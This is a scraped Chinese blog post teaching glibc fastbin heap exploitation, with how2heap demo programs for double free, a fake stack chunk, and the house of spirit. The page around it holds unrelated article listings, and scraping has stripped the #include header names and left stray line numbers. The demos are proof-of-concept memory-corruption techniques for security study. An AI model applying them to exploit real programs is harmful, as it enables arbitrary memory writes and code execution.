linux适当堆内存,linux堆内存漏洞利用之fastbin

最新推荐文章于 2021-08-01 15:58:49 发布
最新推荐文章于 2021-08-01 15:58:49 发布
阅读量61 收藏
点赞数
文章标签: linux适当堆内存

背景介绍

在前一节主要介绍了Glibc的堆内存管理的机制,在上一节的基础上,我打算介绍一下针对Glibc堆内存管理的攻击。此系列我打算按攻击面是哪一个bin来展开,主要分为:

fastbin的攻击

smallbin的攻击

largebin的攻击

unsorted bin的攻击

top chunk的攻击

本文主要介绍fastbin的攻击

fastbin漏洞利用

具体的fastbin的介绍请参考前一节和 Linux堆内存管理深入分析(下),在本节中主要结合how2heap的代码来介绍一下具体的漏洞利用思路。

fastbin double free

double free的意思就是一个malloc的指针被释放了两次,由于针对fastbin的free处理只是对double free做了简单的判断,所以很容易绕过它的double free判断。free() fastbin时的判断如下所示:

1

2

3

4

5

6

7/* Check that the top of the bin is not the record we are going to add

(i.e., double free). */

if (__builtin_expect (old == p, 0))

{

errstr = "double free or corruption (fasttop)";

goto errout;

}

其中old指针为fast bin的头指针,即此处只是判断fastbin的头指针和p指针是否一致。所以fastbin double free的攻击思路就是我们只要保证要double free的chunk不在fastbin的头部即可。

具体的攻击示例如下:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33#include

#include

int main()

{

printf("This file demonstrates a simple double-free attack with fastbins.\n");

printf("Allocating 3 buffers.\n");

int *a = malloc(8);

int *b = malloc(8);

int *c = malloc(8);

printf("1st malloc(8): %p\n", a);

printf("2nd malloc(8): %p\n", b);

printf("3rd malloc(8): %p\n", c);

printf("Freeing the first one...\n");

free(a);

printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);

// free(a);

printf("So, instead, we'll free %p.\n", b);

free(b);

printf("Now, we can free %p again, since it's not the head of the free list.\n", a);

free(a);

printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);

printf("1st malloc(8): %p\n", malloc(8));

printf("2nd malloc(8): %p\n", malloc(8));

printf("3rd malloc(8): %p\n", malloc(8));

}

在此示例中,首先申请三个大小为8的int数组,然后先free(a),由于fast bin是一个单链表,在插入和删除的时候只在头部进行,所以此时将a的chunk放入了fast bin的头部,随后又free(b),此时fast bin的头部为chunk b,随后又free(a),此时由于fast bin的头部为chunk b,所以在free()的时候进行判断old == p不会抛出错误进而绕过这个简单的判断处理。再进行malloc的时候首先会从fast bin的头部进行删除,则接下来第一个分配的chunk为chunk A,第二个分配的为chunk B,接下来会再次分配chunk A。

绕过示例结果如下所示:

00757ba6ca3f4f48e275bd4cadd82f32.png

fast bin double free in stack

上面的那个例子只是简单的一个double free,这个例子是利用double free漏洞在栈中构造了一个fake chunk。

其具体的示例如下所示:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52#include

#include

int main()

{

printf("This file extends on fastbin_dup.c by tricking malloc into\n"

"returning a pointer to a controlled location (in this case, the stack).\n");

unsigned long long stack_var;

printf("The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);

printf("Allocating 3 buffers.\n");

int *a = malloc(8);

int *b = malloc(8);

int *c = malloc(8);

printf("1st malloc(8): %p\n", a);

printf("2nd malloc(8): %p\n", b);

printf("3rd malloc(8): %p\n", c);

printf("Freeing the first one...\n");

free(a);

printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);

// free(a);

printf("So, instead, we'll free %p.\n", b);

free(b);

printf("Now, we can free %p again, since it's not the head of the free list.\n", a);

free(a);

printf("Now the free list has [ %p, %p, %p ]. "

"We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);

unsigned long long *d = malloc(8);

printf("1st malloc(8): %p\n", d);

printf("2nd malloc(8): %p\n", malloc(8));

printf("Now the free list has [ %p ].\n", a);

printf("Now, we have access to %p while it remains at the head of the free list.\n"

"so now we are writing a fake free size (in this case, 0x20) to the stack,\n"

"so that malloc will think there is a free chunk there and agree to\n"

"return a pointer to it.\n", a);

stack_var = 0x20;

printf("Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);

*d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

printf("3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));

printf("4th malloc(8): %p\n", malloc(8));

}

在以上代码中,当d被malloc的时候,此时还有对应的chunk a在fast bin中,所以如果对d进行修改,也会影响到chunk a的值。我们知道malloced chunk和freed chunk对应的结构不一样,对与同一个chunk A来说,有两种形式–对于d来说,其对应的是malloced chunk,而其在fast bin中还有一个freed chunk。

其示例如图所示:

2af4e532aa79dd1a6e795fe4d96bdd16.png

可以看到d(payload开始地址)正好对应了chunk A的fd指针,将d的值赋值为&stack_var-8,则 stack_var=0x20即为在栈中伪造的chunk的size=0x20,与此fast bin的大小对应,此时chunk A的fd指向了在栈中伪造的chunk,此时就将伪造的chunk放入了fastbin链表中。进而malloc可以返回伪造的指针。

该示例代码的运行结果如下所示:

b6760b8b8f901601e7bba1350d145cec.png

The house of spirit

此攻击也是在栈中伪造fake chunk,和第二个攻击不同的是其只是在栈中声明了一个指针,而并没有通过malloc()函数来在堆中申请空间,接着将该指针赋值为特定的伪造的chunk的地址,随后free该指针,就将在栈中伪造的chunk添加到对应的fastbin中去了。具体的示例如下所示:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35#include

#include

int main()

{

printf("This file demonstrates the house of spirit attack.\n");

printf("Calling malloc() once so that it sets up its memory.\n");

malloc(1);

printf("We will now overwrite a pointer to point to a fake 'fastbin' region.\n");

unsigned long long *a;

// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)

unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

printf("This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[7]);

printf("This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");

printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");

fake_chunks[1] = 0x40; // this is the size

printf("The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");

// fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8

fake_chunks[9] = 0x1234; // nextsize

printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);

printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

a = &fake_chunks[2];

printf("Freeing the overwritten pointer.\n");

free(a);

printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);

printf("malloc(0x30): %p\n", malloc(0x30));

}

示例的结果如下图所示:

d302d2e410bbe5cf0ff1ff810d3436cc.png

参考

weixin_39721807
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn学习-how2heap-fastbin_dup
qq_39153247的博客
08-20 1413
今天打完比赛身心疲惫,来复习复习把,写一点简单的把   之所以记录一下fastbin,是因为现阶段我能接触到最多的就是它了。   fastbins: 程序中总是会分配一些比较小的堆块,对于这些堆块来说,如果我们直接将他们合并,那么下次申请的时候还需要重新切割出来,降低了运行的效率,所以ptmalloc设计了fastbins. fastbins共有10个bin,分别是8-80字节,依次增...
linux 堆溢出学习之malloc堆管理机制原理详解
热门推荐
jmp esp
03-02 1万+
前言在pwn的学习过程中,最为难啃的骨头莫过于堆相关的利用,然而无论是在实际情况下还是在ctf比赛中,堆利用都是绝对的主流,是漏洞的主要类型之一。鉴于国内相关资料有限,系统讲解堆溢出利用的更是少之又少,我在此整理相关内容,既能作为自己学习的记录,也希望能够给大家带来一定的作用,不过鉴于本人也在学习之中,如有错误希望大家包涵,并且能够积极指正。堆的基础知识什么是堆堆是一种全局的数据结构,用以动态管理系
Linux下堆漏洞利用(off-by-one)
nibiru_holmes的博客
03-14 8587
一个字节溢出被称为off-by-one,曾经的一段时间里,off-by-one被认为是不可以利用的,但是后来研究发现在堆上哪怕只有一个字节的溢出也会导致任意代码的执行。同时堆的off-by-one利用也出现在国内外的各类CTF竞赛中,但是在网络上还不能找到一篇系统的介绍堆off-by-one利用的教程。在这篇文章中我列出了5种常见的堆上的off-by-one攻击方式,并且给出了测试DEMO,测试的
linux内核申请堆,Linux内核堆缓冲区溢出漏洞
weixin_34736362的博客
04-30 99
该楼层疑似违规已被系统折叠隐藏此楼查看此楼Linux 内核 2.6.32.14Linux 内核 2.6.32.13Linux 内核 2.6.32.12Linux 内核 2.6.32.11Linux 内核 2.6.32.10Linux 内核 2.6.32.1Linux 内核 2.6.32-rc8Linux 内核 2.6.32-rc7Linux 内核 2.6.32-rc5Trustix Secure...
linux内核熵,Linux内核堆强化漏洞利用研究
weixin_34851493的博客
05-01 147
0x01 摘要常见的堆利用技术中的空闲列表投毒会破坏堆分配器的空闲块的链接列表。堆分配后将返回投毒的地址,Linux内核引入了堆强化,这使这些链接列表中的指针会变得非常模糊。在不知道密钥和指针地址的情况下,攻击者无法可靠地用选定的地址毒化指针。在这篇文章中,我将分析Linux内核的free列表指针混淆有一些缺陷,在适当的条件下,攻击者可以进行自由列表投毒攻击。0x02 介绍Linux内核中的默认堆...
linux堆内存漏洞利用fastbin
pang241的专栏
09-24 1813
背景介绍在前一节主要介绍了Glibc的堆内存管理的机制,在上一节的基础上,我打算介绍一下针对Glibc堆内存管理的攻击。此系列我打算按攻击面是哪一个bin来展开,主要分为: - fastbin的攻击 - smallbin的攻击 - largebin的攻击 - unsorted bin的攻击 - top chunk的攻击本文主要介绍fastbin的攻击fastbin漏洞利
关于如何理解Glibc堆管理器(Ⅲ——从DoubleFree深入理解Bins)
Tokameine的博客
08-01 379
本篇实为个人笔记,可能存在些许错误;若各位师傅发现哪里存在错误,还望指正。感激不尽。 若有图片及文稿引用,将在本篇结尾处著名来源。 环境与工具: Ubuntu16.4 / gcc / (gdb)pwn-dbg 范例:howtoheap2 搭建调试环境: git clone https://github.com/shellphish/how2heap.git cd how2heap make 对于GitHub可能速度过慢的情况,可以尝...
linux 堆 ctf 实例,CTF中做Linux漏洞利用的一些心得
weixin_31574149的博客
05-13 583
其实不是很爱搞Linux,但是因为CTF必须要接触一些,漏洞利用方面也是因为CTF基本都是linux的pwn题目。基本的题目分类,我认为就下面这三种,这也是常见的类型。下面就分类来说说0x0.栈溢出栈溢出一般都是CTF中,PWN类别的第一题。基本思想就是覆盖栈中返回地址啦,这个谁都知道。这种题一定会有NX保护,怎么跳是问题。常见的是leak出一个函数的got表,leak方法题中一定会给出的,然后看...
堆漏洞挖掘中fastbins的大小(DEFAULT_MXFAST、MAX_FAST_SIZE)
董哥的黑板报
07-30 1948
一、fastbins大小的默认最大值(DEFAULT_MXFASTfastbin中支持的fastchunk的默认最大值为128字节。在glibc中用“DEFAULT_MXFAST”宏定义表示 二、fastbins大小的最大值(MAX_FAST_SIZE) 但是其支持的fastchunk的数据空间最大为160字节。在glibc中用“MAX_FAST_SIZE”宏定义表示 最大值的g...
堆漏洞挖掘——fastbin attack漏洞
董哥的黑板报
08-12 3170
一、核心思想 通过fastbins链的管理,达到目标地址(target)读写 二、原理图解 fastbin存储freechunk的单链表结构: fastbins是如何存取fastchunk的,见文章:https://blog.csdn.net/qq_41453285/article/details/97613588 第一步:我们知道被free的chunk会被放入到arena所管理的f...
[毕业设计]VB环境下电脑销售与财务管理系统开发(ACCESS+源代码+论文).zip
08-05
[毕业设计]VB环境下电脑销售与财务管理系统开发(ACCESS+源代码+论文)
PPO(Proximal Policy Optimization,近端策略优化)算法
08-05
在解答2024年华数杯全国大学生数学建模竞赛的C题“老外游中国”时,虽然PPO(Proximal Policy Optimization,近端策略优化)算法主要是应用于强化学习领域,特别是在解决连续动作空间的策略优化问题上,但在此数学建模竞赛中,它并不直接适用于数据处理、综合评价或路径规划等任务。不过,我们可以从数据处理和决策优化的角度,类比强化学习中的一些思想来构思解题策略。 然而,对于本题而言,我们可以更侧重于数据分析、综合评价模型(如层次分析法AHP、TOPSIS、模糊综合评价等)和路径规划算法(如Dijkstra、A*、遗传算法等)来解决问题。以下是对各个问题的进一步建模思路: 一、问题1建模思路 1.1 数据处理与分析 数据收集与清洗:首先,需要加载所有352个城市的CSV文件,对每个城市的100个景点信息进行数据清洗,去除无效或缺失的关键信息(如评分缺失的景点)。 最高分查找:遍历所有景点,找到最高评分(BS),并统计获评该评分的景点数量。 城市排名:统计每个城市获评BS的景点数量,并根据数量多少进行排序,列出前10个城市。 二、问题2建模思路 2.1 综合评价体系构建
中国城市统计年鉴(1985-2023)
08-05
《中国城市统计年鉴》是全面反映中国城市社会经济发展情况的资料性年刊。《中国城市统计年鉴—2023》收录了2022年全国各级城市社会经济发展等方面的主要统计数据。 本年鉴内容共分四个部分: 第一部分是全国城市行政区划,列有不同区域、不同级别的城市分布情况; 第二、三部分分别是地级以上城市统计资料和县级城市统计资料,具体包括人口、资源环境、经济发展、科技创新、人民生活、公共服务、等方面的数据; 第四部分是附录,为主要统计指标解释。 需要说明的是,从1997年开始,地级以上城市和县级城市分别采用不同的统计制度,有些指标在两类城市之间不具有可比性,故本年鉴将地级以上城市和县级城市统计资料分为独立的两部分。本年鉴所涉及的全国或全部城市统计资料,均未包括香港特别行政区、澳门特别行政区和台湾省。
振中TP900 驱动工具2.2
08-05
振中TP900 驱动工具2.2
大学信息安全试题精选12
08-05
大学信息安全试题精选 【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
mutiple_pie (8).zip
08-05
mutiple_pie (8).zip
基于pytorch实现的ResUnet对BRATS脑肿瘤多模态分割项目(数据集、源码、训练结果)
最新发布
08-06
基于pytorch实现的ResUnet对BRATS脑肿瘤多模态分割项目(数据集、源码、训练结果) 本项目对BRATS脑肿瘤的四种模态FLAIR、T1w、t1gd、T2w进行融合分割 实现思路,将四种模态进行融合,并且将原始的nii.gz数据转换成npy数据。然后将四种模态的npy数据输入resUnet网络,总共训练了30个epoch,训练集的iou达到了0.84左右 如果想更换数据集进行多模态的训练,更换数据集按照readme文件操作即可
[毕业设计]JAVA大文件分块传输与合并机制(源代码+论文).zip
08-05
[毕业设计]JAVA大文件分块传输与合并机制(源代码+论文)
Linux堆内存管理深入探讨
要掌握堆溢出漏洞利用,首先必须理解Linux的内存模型和ptmalloc2的工作原理。通过学习《Understanding glibc malloc》这样的文章,并结合其他参考资料,可以逐步揭开堆内存管理的神秘面纱,为理解和利用这些漏洞打下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值